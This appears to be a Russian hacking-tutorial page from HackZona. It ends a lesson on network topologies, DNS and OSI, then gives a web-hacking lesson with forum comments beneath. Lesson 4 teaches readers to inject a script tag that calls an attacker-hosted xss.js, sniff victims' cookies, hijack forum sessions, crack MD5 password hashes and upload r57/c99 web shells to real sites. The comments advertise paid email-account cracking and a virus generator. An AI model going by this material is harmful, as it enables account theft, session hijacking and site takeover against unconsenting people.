Если в такую сеть поставить сниффер, то взломана будет вся сеть. Как думаешь, почему? Преимуществом такой топологии является то, что отправитель проверяет, пришли ли данные адресату. К минусам надо отнести то, что если хоть на одном компьютере сеть выходит из строя, ее работа нарушается. Также к минусам можно отнести загруженность канала при большом количестве машин. Посуди сам, если каждый юзер будет передавать инфу по сети одновременно, то в канале будут скапливаться данные со всех машин, и чем их больше, тем сеть медленнее. И рисунок (http://narod.yandex.ru/100.xhtml?zerobyte2006.naro...

Общая шина. Наверняка ты не раз слышал об этой связи. Здесь все машины сети используют один и тот же сетевой кабель, имеющий Т-образные ответвления на каждый из компьютеров. Прелестью данной системы является то, что выход из строя какого-либо узла никак не отражается на работе остальных компьютеров, чего нельзя сказать о ячеистой(см. ниже) и кольцевой топологиях.Рисунок(http://narod.yandex.ru/100.xhtml?zerobyte2006.naro...

Ячеистая топология. Компьютеры выходят в сеть друг через друга, цитируя один учебник, вычтите из полносвязной топологии некоторые связи и Вы получите ячеистую топологию. И, конечно, рисунок (http://narod.yandex.ru/100.xhtml?zerobyte2006.naro...

Звезда. Здесь есть только два типа компьютеров - сервер и все остальные). Каждый компьютер подключен только к серверу, через который он и обменивается информацией с другими компьютерами, которые тоже связаны с этим сервером. Рисунок(сервер обозначен красной точкой)(http://narod.yandex.ru/100.xhtml?zerobyte2006.naro...

Бывают и сложные, смешанные топологии. Они получаются тогда, когда несколько топологий перемешиваются в пределах одной боьшой сети. Например, в одном помещении ячеистая топология, в другом - беспроводная полносвязная сеть, и все они подключены к общему серверу.


При построении сети надо учитывать расстояние между компьютерами, удобства подводки кабеля, и исходя из обстоятельств, выбрать один из вышеперечисленных типов. Для общего развития советую вышесказанное знать. Возможно, это тебе пригодится, возможно, нет. Если ты столкнешься с проблемой взлома сети, надо же иметь представление, как она устроена, куда ставить сниффер, и всё такое. Я считаю, что нет нужды раздалбывать топологии дальше, поверхностных знаний тебе хватит.

Железо, используемое в сетях Редко когда большие сети состоят только из копьютеров, соединенных кабелем.

{
в процессе написания статьи я хрен знает сколько раз переписывал этот кусок, пытаясь попонятней обьяснить материал. За то, что в итоге получилось автор ответственности не несет))
}
Для того, чтобы сеть работала эффективно и при этом было понятно, как она это делает, в ней должна быть какая-то иерархия. Представь себе полносвязную сеть на 50 компьютеров)). Вопрос структуризации сети решают с помощью сетевого оборудования, о котором мы сейчас и поговорим.

Повторитель. При построении сети есть один особенный подводный камень - длина одного участка кабеля между соседними компьютерами не должна превышать 100 метров. Чтобы убрать это ограничение, и используются повторители. По сути, это обычный усилитель сигнала. Чтобы провести сеть в соседний дом, надо через каждые 90-100 метров ставить повторитель. Гланое его свойство - ловить сигнал на одном порту и, усиляя его, отражать на другой.

Рисунок (http://zerobyte2006.narod.ru/art/osnhack3.files/po...

HUB. Хаб - это тот же повторитель, только у него не 2 гнезда, а несколько, что дает возможность обединять разные участки сети. То есть: Если на один из портов пришел сигнал, он будет отражен на все остальные.
А теперь перейдем к оборудованию, которое не обьединяет, а делит.

Мост разделяет сеть на участки, таким образом данные проходят через мост только если это действительно необходимо, т.е. если получатель не находится в одном сегменте с отправилелем.

Коммутатор отличется от моста только тем, что он имеет по процесору на каждое гнездо, в то время как у моста - один процесорный блок на все гнезда. Такая структура повышает производительность.

Маршрутизатор (aka свитч) - это тот же мост, но он, в отличие от моста, использует не аппаратные (типа 0081005е24а8), а составные, более осмысленные числовые адреса, что дает бОльшую гибкость при работе, т.к. явно видно, кому, куда и как.

Шлюз используется для обьединения сетей с разными типами программного и аппаратного обеспечения.
фууууг... Наконец-то. Нудно, но знать надо. А теперь поговорим о программной начинке этих самых сетей.

Адресация в сетях Адреса могут быть нескольких видов: числовые иерархические, как например 192.1.0.1. Такой адрес сожержит в себе информацию о подсети, немер компьютера в ней, что очень удобно в больших сетях, где оборудование сразу должно видеть, в какую подсеть отправлять данные, а там на месте уже разберется местное оборудование. Это позволяет избежать перегрузки канала, избавляет от необходимости искать адресата в общей сети. Вот почему они используются в Интернете.
Плоские - это адреса, которые не содержат в себе никакой иерархии, они более компактны, но медленне обрабатываются.
Аппаратный адрес - это строка в шестнадцатиричном или двоичном виде, которая вшивается в АО фирмой-изготовителем.
Символьный адрес - это тоже строка, но в отличие от аппаратного, она определяется программно.
Каждый компьютер в сети может иметь несколько адресов, например, если я ввожу у себя в LAN в командной строке 192.1.0.1, то я попадаю на комп BoDVa, если просто введу имя BoDVa, то попаду туда же.
За сопоставление имен и адресов в сети отвечает служба DNS (Domain Name Server). Теперь по порядку, как это происходит:
Я пишу в браузере имя сайта fssr.ru
Эта строка отправляется на DNS
DNS ищет в базе данных имя fssr.ru
Если находит, то
соединяет меня с хакзоной через IP, если нет -
обращается к DNS, стоящей в иерархии выше нее.
Вот так и работает Интернет. Его называют паутиной по двум причинам:
его структура и правда напоминает паутину
Страницы связаны между собой ссылками, типа нитями, составляющими вцелом паутину.

OSI, ISO ISO - International Standertization Organization - это организация, которая диктует стандарты, при чем ее влияние распространяется не только на компьютеры, но и на всё остальное. Посмотри снимательно на упаковку от сока и увидишь надпись: ISO 9001. Это стандарт качества. Если надписи ты не увидел, значит сок у тебя некачественный, пора переходить на пиво)).
OSI - Open Systems Interface, величайшее творение ISO. Это переводится как "интерфейс открытых систем", в соответствии с которым данные до начали передачи проходят по цепочке из семи уровней, на каждом из которых решаются свои проблемы своими способами. Эти уровни связаны между собой - каждый из них может общаться с соседними(ну типа который выше и который ниже него). При получении данные опять проходят по этой цепочке на другом компьютере, только снизу вверх. Вот как выглядит структура OSI (http://narod.yandex.ru/100.xhtml?zerobyte2006.naro...

Давай отследим, как же твое письмо доходит до получателя:
Ты тыкаешь кнопку Отправить в Аутглюке. Это прикладной уровень.
Письмо кодируется и шифруется. Это представительный.
Письмо уходит на smtp-сервер, который контролирует отправку. Это сеансовый уровень.
Производится контроль за отправкой данных, чтобы не было утерь и нарушений (протокол TCP). Это транспортный.
Сетевой. Здесь обеспечивается передача данных между разными сетями.
Канальный. Идет передача внутри сети.
Физический. Передача электрических импульсов по кабелю.
Это всё очень сжато. Если интересует подробнее, посмотри соотв. литературу.

ARPAnet aka Internet Это последняя тема нашего сегодняшнего урока. Интернет представляет собой глобальную сеть, в которой обьединены ВСЕ сетевые технологии и способы передачи данных (спутники, телефонный кабель, Bluetooth, Wi-Fi, и т.д.). Существует сообщество w3c(http://www.w3.org/), которое устанавливает правила, по которым работает Интернет. Есть дерево DNS, отвечающее за адресацию, и сервера, на которых они хранятся. Где - увы, не знаю. Сейчас многие не представляют своей жизни без этого, а между прочим, это разработка Министерства Обороны США. Изначально это разрабатывалось как внутренняя сеть Пентагона, но с возможностью доступа к ней откуда угодно. В связи с ростом популярности UNIX-систем (на которых Инет и держится), сеть ARPAnet была переименована в InterNet и получила всемирное распространение. Должен сказать, я восхищаюсь людьми, у которых хватило фантазии на создание такого грандиозного проекта, который себя оправдал.

[Offtopic]
Во-превых, хотелось бы отметить, что теперь оригинальные статьи дополняются авторскими иллюстрациями, и я рекомендую смотреть также оригиналы, т.к. в некоторых местах без них что-то может быть непонятно.


[FAQ]
Мне очень часто задают одни и те же вопросы, которыми зафлуживают мыло и аську, поэтому выношу наиболее частые, чтобы они не повторялись:
Q: Я прочитал урок 1/2/3, и т.д. Когда будут остальные? A: Я не могу похвастаться регулярностью написания статей, могу сказать только одно: они будут. Q: Ты можешь быть моим учителем? A: Жаль, но у меня нет времени на персональный подход. Читай уроки, задавай по ним вопросы. Q: Ну пожалуйста! A: ответ выше; Q: Я хочу сломать e-mail на мыло.ру. Как это сделать? A: Читай уроки, всё придет. Q: Научи меня пользоваться брутфорсом! A: Я лишь описал технологии взлома, а вот какие кнопки нажимать в программе - это должно быть и так понятно. ХакЗона, знай своих героев! На написание этой серии статей меня подтолкнули следующие юзеры:

BandBoy
don-daniil
Assambler
, за что им спасибо. На этом я ненадолго прервусь с уроками по уважительной причине. Всем желаю хорошо встретить Новый Год.


VladUha :: HackZona


Примечание Цензора: Перепечатка возможна только с разрешения автора с указанием ссылки на HackZona.Ru



---
Пиратия форева. Хакинг форева, Рок форева.

Anonymous
Основы хакерства. Урок 4
2109 дней назад 09.07.2008 19:19:56 Цитата('1948717','941756','6','873')">Сообщить о спаме

Основы хакерства. Урок 4
[ Хакерство для новичков ]


Основы


Привет, читатель! Вот мы и добрались до самого интересного. Сегодня мы поговорим о веб-хакинге, о том, кто, зачем, и какими способами взламывает сайты, какие бывают уязвимости, что такое сплойты, кто такие скрипт-кидди и почему лучше искать уязвимости самостоятельно, вручную. Темы урока:
Кто и зачем
Что такое уязвимости
Уязвимости класса XSS
Cookies. Вся правда
Исследование куков
Воруем куки
Что такое шелл
Заливаем шелл
Веб-хакинг - это самое популярное направление среди современных хакеров. Чаще всего под словом "хакинг" сейчас понимают взлом веб-сайтов. Делают это самыми разными способами. Давай сначала разберемся с терминами. Под словом "взлом" я понимаю (не)санкционированный доступ к ftp-аккаунту, базе данных. ftp - FILE TRANSFER PROTOCOL - протокол, предназначенный специально для передачи файлов. Это - один из старейших протоколов Интернет. При подключении на site.com по http мы видим браузером его главную страницу, при подключении по ftp мы увидим список файлов этого сайта. Другой вопрос, пустят нас или нет, т.к. в большинстве случаев для ftp нужен пароль. Как гласит подпись нашего главного админа, ВСЁ, ЧТО СОЗДАЛ ЧЕЛОВЕК, МОЖНО ВЗЛОМАТЬ. ИДЕАЛЬНОЙ ЗАЩИТЫ НЕ СУЩЕСТВУЕТ. И как ни крути, это правда. В Интернете очень много уязвимостей. Статистика показывает, что большинство динамических сайтов Интернета подвержены XSS и SQL injection. Хакеры ищут эти уязвимости и пытаются попасть внутрь. Но ведь бессмысленных взломов не бывает, верно? Т.е. лично я не ломаю каких-то левых сервисов, на которые зашел случайно, а выбираю себе совершенно конкретную цель, и тогда уже работаю над ней, пока не получу доступ. Многие пишут мне письма, и в конце добавляют - "только не ломай мою асю/мыло" или "только не закидывай мне вирус". Наивные)). Знаешь, почему? Правильно. Зачем мне троянить их компы, если мне это совершенно не надо?
Вывод: не занимайся неинтересными вещами. Вот если бы я прознал, что у него на компе лежит дамп БД ХакЗоны, я наверняка полез бы туда. Теперь цель очевидна - дамп. Из этого правила есть исключение - так называемый Google-хакинг. Представь себе такую обстановку: Каникулы, суббота, вечер, делать нечего, все знакомые тебя уже опасаются, рядом с компьютером наготовлена/недопита бутылка/банка пива/колы(нужное подчеркнуть( к цензору не относится;) ) ). Тогда твоя рука машинально тянется к ярлычку Inet.lnk, перед тобой возникает стартовая страница: Google. Ты вводишь запрос "filetype:dat inurl: Program Files", и перед тобой список бесплатных шестизначек)). Или пишешь "Powered by Invision Power Board 2.1.3" и запускаешь готовый сплойт от RST. Вот так иногда развлекаются ксакепы. Если смысл последних двух предложений остался тайной, покрытой мраком, ты прочитаешь об этом ниже.

Самый распространенный и популярный вид уязвимостей - это XSS. Смысл уязвимости заключается в том, что переменные, которые передаются какому-либо скрипту для последующей записи и вывода не фильтруются. Т.е. когда ты отписываешься в гостевой книге, кроме текста ты можешь писать любой HTML-тег, и он выполнится. Для наглядности я приготовил дырявую гостевую(http://powertray.t35.com/vlad-xss/). Почему уязвимости XSS были, есть и будут проще всего понять, проанализировав файл записей вышеназванной гостебуки;)
http://powertray.t35.com/vlad-xss/guestbook.txt.
Зайди туда и в тексте напиши:

{a href="http://fssr.ru"}HackZona{/a}.
Как видишь, появилась ссылка. Это говорит о том, что выполнился HTML-код. Да, ссылка не несет никакой опасности, но ведь вместо тега {a} можно подставить тег {script}, и тогда мы получим в свое распоряжение всю мощь языка JavaScript. Давай разберемся, как при помощи этой уязвимости воруют cookies. Но сначала о том, что такое cookies.

[cookies] - это ВРЕМЕННЫЕ файлы, созданные сервером, которые хранятся на компьютере пользователя. В них содержится информация, такая как логин, пароль, хэш пароля, пользовательские настройки, и др. Использование кукисов освобождает пользователя от необходимости каждый раз при входе на аккаунт вводить пароль, например. Каждый сайт может создать у тебя на компьютере кукис, и вместо того, чтобы спрашивать у тебя логин/пароль просто считать их оттуда. В целях безопасности, сервер имеет доступ только к тем кукисам, которые создавал он, т.е. куки с других сайтов он читать не может.
Заметь, я выделил слово ВРЕМЕННЫЕ. Это означает, что они живут у тебя на машине только определенное время, после чего деактивируются. Дата, когда они становятся недействительными, тоже содержится в них, эта колонка называется EXPIRE DATE.

[Исследование куков]
Давай исследуем, какие же куки есть у тебя на компьютере.
В дальнейшем тебе по-любому для работы с куками IE понадобится программа IECookiesView, ссылки не имею, найдешь)).
Для расшифровки хэшей используй PasswordsPro, линк был в первом уроке.
Не прячь PasswordsPro далеко, т.к. в будущем она тебя будет реально выручать. В правильных руках это швейцарский нож для разделывания паролей.

[Исследование куков форума IPB]
Допустим, что я и мой товарищ зарегистрированы на некоем форуме www.forum.zu на основе Invision Power Board версии 1.х. Мы имеем свежие куки нашего друга, утянутые, в моем случае с помощью ALB. Я открываю IEcookiesView, ищу наш форум. Вижу два поля: member_id: 23
pass_hash: b513f22c3db6932855ad732f5f8a10a2
Ну тут НЕ догадаться трудно:
member_id - порядковый номер пользователя (у главного админа он равен 0)
Я зарегистрировался 23м по счету.
pass_hash - md5-хэш моего пароля.
Рисунок (http://narod.yandex.ru/100.xhtml?zerobyte2006.naro...
Дальше я копирую в папку с куками (C:Documents and SettingsVladUhaCookies) файл, утянутый у друга, предварительно заменив никнейм_френда@forum.zu на vladuha@forum.zu, так, чтобы он заменил мой старый. Открываю этот кук, и вижу следующее: member_id: 24
pass_hash: e10adc3949ba59abbe56e057f20f883e
Он зарегистрировался сразу после меня. Во-первых, я открываю Internet Explorer и захожу на www.forum.zu Опа! Здрастте, "никнейм_френда"!
Ваш последний визит: дд.мм.гг Неплохо, но мало. Я хочу получить пароль, а не просто украсть сессию. Я открываю PasswordsPro, "восстановление паролей к хэшам", нажимаю "редактировать" на записи User, тип уже установлен - MD5. В поле "Хэш" вставляю затыренный хэш.
Рисунок (http://narod.yandex.ru/100.xhtml?zerobyte2006.naro...
Не забудь о том, что надо тщательно выставить настройки атаки.
Скрестив пальцы, нажимаю "Начать атаку".
Пароль оказался простым и очень быстро подобрался. Это был 123456. Кстати, прежде чем брутить хэш, загляни сюда: если тип хэша MD5, возможно, тебе повезет и ты найдешь пароль по базе данных этого сайта(http://www.ivdb.org/). Если нет, придется брутить.
В IPB версий 2.х в колонке pass_hash находится не хэш пароля, а просто пропускной ключ, его сбрутить уже не получится. Теперь ты знаешь, что такое cookies, как их подменять, и что это дает. А теперь давай научимся их вытягивать, используя XSS. Для этого тебе нужен специальный набор скриптов, я советую использовать мой собственный: http://powertray.t35.com/snif.rar.
Теперь давай разберемся, как это работает. Открой xss.js в блокноте. Это скрипт, который ты должен умудриться внедрить на уязвимый форум. Когда он выполняется, он показывает невидимый iframe, следствием чего является передача куков снифферу xss.php, который должен быть расположен на хостинге с поддержкой PHP и правильно выставленными правами на запись(делается вручную). При вызове xss.php, он автоматически фиксирует время, IP-адрес жертвы в данный момент времени, откуда она пришла (REFERER), ну и записывает(добавляет) это всё, а также куки жертвы в файл snif.html. Отдельно я подошел к оформлению html-файла с результатами. Большинство куки-снифферов, которые я видел на форумах, написаны на скорую руку - неудобные, малофункциональные. Я решил внести в это дело немного стиля. Кстати, CSS-оформление я позаимствовал из веб-шелла команды АК-74, за что им спасибо(Привет Теллуру;)). В результатах при клике на IP откроется окно, которое расскажет тебе об этом адресе все, что знает)).
Итак, все эти файлы ты загружаешь на свою домашнюю страницу.
Как ты, наверное, уже догадался, xss.js должен ВЫПОЛНЯТЬСЯ на уязвимом форуме(чате, сайте ... )
Принцип работы сниффера понятен, следующий этап - проинклудить его в уязвимую страницу. С моей гостевой это не получится, там не используются куки. Куда это приткнуть ты уже найдешь сам. Делается это строчкой
{script language=javascript src=http://твой_сайт.zu/xss.js}
Кто-то просил примеров побольше... Ладно, вот пример: Есть некий форум site.com, и твоя страничка pupkin.ru
И вот представь себе, оказывается, форум на сайте самописный, а в таких случаях часто можно найти уязвимость. Ты долго по нему лазишь в надежде найти что-нибудь интересное, и находишь: аватар можно загрузить напрямую с твоего компьютера или вместо этого показывать его с какого-то адреса в Интернете. Причем разработчики не посчитали нужным проверять, действительно ли это картинка. Поле должно выглядеть примерно так:

URL вашей картинки: http://hacker.zu/xss.js
Ты нажимаешь кнопку "Сохранить" внизу страницы, заходишь на форум и видишь, что никакой на аватаре, естественно, нет. Вместо этого твои куки с форума перекочевали на сниффер. Идешь, проверяешь snif.html.
Что ты там увидишь - я предсказать не в силах, могу лишь посоветовать не обольщаться, ибо самописные форумы - это редкость, а если и есть, то они хорошо защищены. Если ты найдешь такой, можешь считать себя счастливчиком;).

[Разведение шеллов]
А теперь давай поговорим о шеллах. Веб-шелл в данном случае представляет собой php-файл, предназначенный для управления взломанным сервером. На данный момент я знаю не так много хороших шеллов, но могу посоветовать r57 или c99. Скачать увесистый набор веб-шеллов можно отсюда(http://www.damagelab.org/index.php). Прямой ссылки не имею, поищи по форуму.
Рисунок(http://narod.yandex.ru/100.xhtml?zerobyte2006.naro...
Шелл в действии

[Заливаем шелл]
Как ты понял, чтобы управлять (на самом деле управлять - громко сказано, это как получится) файловой системой взломанного ресурса, нужно закачать туда шелл. Делается это посредством нахождения соответствующей уязвимости. Здесь будь внимательным: файл шелла должен быть именно ЗАКАЧАН на уязвимый сайт, а не просто показан. Т.е. в предыдущем примере с форумом мы сможем залить шелл через аватар только в том случае, если форум автоматически закачивает указанный файл себе на винт, в противном случае мы увидим файловую систему того сервера, на котором шелл расположен изначально. А нам нужна ФС ФОРУМА. Кстати о предыдущем примере. Тут вроде бы все ясно: В поле рисунка вписываем путь к шеллу, на самом форуме кликаем по нашему "аватару" и смотрим, куда он залился. Вызываем браузером этот путь. Вроде все, дополнительно - список статей в оффтопике.

[Offtopic]
Как дополнительный материал советую прочитать:
XSS Новичкам. Автор: DrWeb
Теоретические основы хакинга. Автор: DrWeb
Взлом чатов by Algol. теория и практика(ищи на Античате)
Обход XSS-фильтров при использовании уязвимостей(ищи на Античате)
Введение в веб-хакинг высокого уровня. Автор: Trinux
Формат и синтаксис cookie

Теперь какое-то время специально уроков писать не буду, чтобы ты потренировался в том, что есть, т.к. дальше я буду рассказывать об эксплоитах, но я не хочу делать из тебя киддиса. Для размещения сниффера понадобится бесплатный хостинг с пхп, я могу посоветовать:
www.fatal.ru
www.jino-net.ru
www.holm.ru
www.t35.com (имхо самый лучший из них)

Если кому-то приглянулась моя гостевая, без XSS ее можно будет скачать с моей хоум паги, как только я закончу ее реконструкцию. Я думаю организовать бесплатную email-рассылку "основ хакерства". Преимущества очевидны:
поддержка стилей
поддержка картинок
самый быстрый способ получения статей
Могу найти в ней место под 1 баннер 648х60, ищу спонсора(uha90@mail.ru). Если Вам нравятся уроки серии "Основы хакерства", поддержите автора, перейдя по этой ссылке(http://www.russianfeme.com/index.html?ref=VladUha)... Это даст мне пару центов по партнерской программе. Как только там соберется какая-то сумма денег, я переведу их на WM и оплачу Интернет.

VladUha::HackZona



---
Пиратия форева. Хакинг форева, Рок форева.

heavyduty

1805 дней назад 09.05.2009 19:34:37 Цитата('1948717','88','6','1277')">Сообщить о спаме

Уроки это хорошо вот только сколько их будет? А то на хакер.ru тоже были уроки а потом все куда то пропали. Пока что я изучаю это искуство взлома - http://depositfiles.com/files/4vpvo3w1g Уроки от Хакер9009(только уроки) - http://depositfiles.com/files/lj69ogbgk Уроки от Хакер9009(полная версия) - http://depositfiles.com/files/6ifdg1xtd



Олег
!!!!!!!!!!!
1621 день назад 10.11.2009 11:48:16 Цитата('1948717','88','6','1254')">Сообщить о спаме

ВОТ ЭТА ТОЧНО ПОЛЕЗНАЯ ИНФА ДЛЯ НОВИЧКОВ !!!!!!!! Я ХОТЬ И ПЫТАЛСЯ СТАТЬ ХАКЕРОМ САМОУЧКОЙ , И ВЗЛАМАЛ 1 РАЗ MAIL.RU ! НО КОНЕЧНО ОХОТО ЗНАТЬ ПОБОЛЬШЕ И НАШЕЛ ЭТОТО САЙТ ! АВТОРУ РЕСПЕКТ !!!


Alisiya
1602 дня назад 28.11.2009 19:32:42 Цитата('1948717','88','6','1262')">Сообщить о спаме

Статья класноя!!!Я всё прочитала от и до!А у тебя нет знакомых Хакеров Которые какбы индивидуально Научилибы?Или не знаеш где найти тех кто тебя учил?И помогу они мне?


Ikar
1600 дней назад 30.11.2009 17:46:31 Цитата('1948717','88','6','1264')">Сообщить о спаме

Fratris.blogi.by здесь научат
и проги дадут идеально-рабочие
и накормят и нпоят=)


MikyJoicaVicima
1598 дней назад 03.12.2009 13:00:53 Цитата('1948717','88','6','1273')">Сообщить о спаме

ВНИМАНИЕ! НОВИНКА!

Что такое - www.V-SEKRETE.ru

http://v-sekrete.ru - программное обеспечение, которое превращает Рабочий Стол вашего компьютера в закрытый частный стриптиз-клуб.

Девушки танцуют на Вашем рабочем столе, в то время как вы можете продолжать работать за компьютером.


AntonIgnatoff
1596 дней назад 05.12.2009 04:38:44 Цитата('1948717','88','6','1272')">Сообщить о спаме

СЕРВИС ПОДБОРА ПАРОЛЯ - www.xxx-co.ru

Мы предлагаем вам осуществить подбор вашего пароля методом брут-форс (brute-force). Его суть состоит в последовательной переборке различных вариантов написания пароля по заданным параметрам. Использовать брут-форс можно практически на всех сервисах. Наш кластер высокопроизводительных серверов и самые новые и актуальные базы позволяют нам подбирать в кратчайшие сроки около 80 процентов паролей.

Отдельно хотим обратить ваше внимание на то, что мы не меняем подобранные пароли. Сам же подбор происходит в полностью автоматическом режиме, что исключает возможность смены регистрационной или иной информации владельца аккаунта. Иными словами, при успешном подборе пароля, мы сразу отображаем его заказчику.

Подбор паролей осуществляется в несколько стадий. Очередность стадий сформирована по принципу «от простого к сложному».

Обратившись к нам, вы сможет восстановить забытые пароли к следующим сервисам:

ВЕБ-ПОЧТА: - Bk.ru - Fromru.com - Front.ru - Gmail.com - Hotbox.ru - Hotmail.ru - Inbox.ru - Krovatka.su - Land.ru - List.ru - Mail.ru - Mail15.com - Mail333.com - Newmail.ru - Nightmail.ru - Nm.ru - Pisem.net - Pochta.ru - Pochtamt.ru - Pop3.ru - Rambler.ru - Rbcmail.ru - Smtp.ru - Yandex.ru

МЕССЕНДЖЕРЫ: - ICQ - MSN Messenger - Rambler ICQ - Skype - Talk.Google.com - Агент@Mail.Ru - Я.Онлайн

САЙТЫ ЗНАКОМСТВ: - 2ya.ru - Flirtru.ru - Gaycity.ru - Gayly.ru - Gut.ru - Jdu.ru - Love.Gay.ru - Love.Neolove.ru - Love.mail.ru - Love.rambler.ru - Loveplanet.ru - Mamba.ru - Maybe.ru - Missing-hearts.ru - My.Lesbi.name - My.Loff.ru - Omen.ru - Qguys.ru - Singles.ru - Smeley.ru

СОЦИАЛЬНЫЕ СЕТИ: - Facebook.com - Odnoklassniki.ru - Vkontakte.ru - Мой Мир@mail.ru

БЛОГИ: - Blog.com - Blog.ru - Blogger.com - Blogspot.com - LiveJournal.ru - Livejournal.com - Privet.ru - Twitter.com - Typepad.com - Блоги@Mail.Ru


ВНИМАНИЕ! Рекомендуется пользоваться сервисом ТОЛЬКО для восстановления СВОЕГО забытого пароля. Мы не несем ответственности в случае использование Вами подобранного пароля в незаконных целях (получении доступа к чужой переписке, анкетам и т.п.) Все данные, переданные Вами нам являются строго конфиденциальными и не подлежат огласке.

ПОЛУЧЕННЫЕ ПАРОЛИ ВЫ ИСПОЛЬЗУЕТЕ НА СВОЙ СТРАХ И РИСК! (в случае, если Вы запросили подбор пароля к чужим данным)

С уважением, администрация сервиса - http://xxx-co.ru/



@


Вася
1588 дней назад 12.12.2009 20:01:46 Цитата('1948717','88','6','1270')">Сообщить о спаме

http://letitbit.net/download/0926.e042693c5a56c86c...

Вот генер вирусов под свой маил и весь хакинг


imy6188 Отправить сообщение
Ivan Brovkin
Взлом почты, взлом e-mail, взлом мыла, почтового ящика, взлом электронной почты
1483 дня назад 28.03.2010 07:50:37 Цитата('1948717','5301483','6','1338')">Сообщить о спаме

ПРОФЕССИОНАЛЬНЫЙ ВЗЛОМ БЕЗ ПРЕДОПЛАТЫ
Полная анонимность, гарантии.

Взлом почты, сайтов знакомств,акаунтов в соц. сетях.

mail.ru
yandex.ru
rambler.ru
gmail.com
ukr.net
yahoo.com
hotmail.com
qip-pochta
mamba.ru
loveplanet.ru
odnoklassniki.ru
vkontakte.ru и многое другое


ПРЕДОПЛАТА НЕ БЕРЕТСЯ. ОПЛАТА РАБОТЫ ТОЛЬКО ПОСЛЕ УСПЕШНОГО ВЫПОЛНЕНИЯ.
ПРЕДОСТАВЛЯЕМ ГАРАНТИИ ВВИДЕ ЛЮБЫХ ДОКАЗАТЕЛЬСТВ ВЗЛОМА НА ВАШЕ УСМОТРЕНИЕ.
ПАРОЛЬ ОСТАЕТСЯ ПРЕЖНИМ И ЖЕРТВА НИ О ЧЕМ НЕ ДОГАДЫВАЕТСЯ, ЧТО ГАРАНТИРУЕТ ВАМ
В ДАЛЬНЕЙШЕМ БЕСПРЕПЯТСТВЕННЫЙ ДОСТУП К ЯЩИКУ ПАРАЛЛЕЛЬНО С ЖЕРТВОЙ.

ЗАКАЗЫ ОТПРАВЛЯЙТЕ НА: ICQ#: 599-567-908, zakaz.com@mail.ru




Взлом мыла на заказ
взломаю почтовый ящик, взлом e-mail, взлом почты,
взломать пароль к почте,
как взломать почтовый ящик,
помогите взломать почтовый ящик,
взломать почту,
взломать email,
получить пароль от почты,
как узнать пароль к электронной почте,
взлом почты на заказ
взлом почты
взлом mail
взломать почту
как взломать почту
взломать пароль
взломать ящик
взлом почтовых ящиков
взлом mail.ru
взломать mail.ru
hack e-mail
как взломать mail
как взломать пароль
как узнать пароль
взломать почтовый ящик
пароль взломать
взлом мыла
взлом e-mail
взлом электронной почты
открыть почтовый ящик
взломать e-mail
взломать почту mail
взлом паролей
взломать знакомства
взлом сайтов
взломать сайт
взлом паролей почты
яндекс
рамблер
взлом
заказ

Имя Пароль
расширенный... ( / Регистрация )

Тема

В тексте можно использовать Wiki или HTML теги



Кто на сайте?
Анонимные: 1, Зарегистрированные: 0 (?)
 
Интересные сайты
Посетители
Календарь
<
Апрель 2014
>
ПнВтСрЧтПтСбВс
 123456
78910111213
14151617181920
21222324252627
282930
Подписка
E-mail: 
Опрос
Кем быть лучше?

Результаты опроса
Топ комментаторов
imy6188 Ivan Brovkin
Комментарии: 4
rikipin санек
Комментарии: 3
arenalin Анатолий
Комментарии: 2
vanodawydow1 Ваня
Комментарии: 2
Другие сайты
4lla Алла Gusan
dj-dardevil Dima Medvedi
vidadi vidadi mamedov
denzeline Denis Derevenchenko
tuaeva-fatima Туаева Фатима
Комментируемые записи
Жалоба | Размещено на MyLivePage | | © Kolobok smiles, Aiwan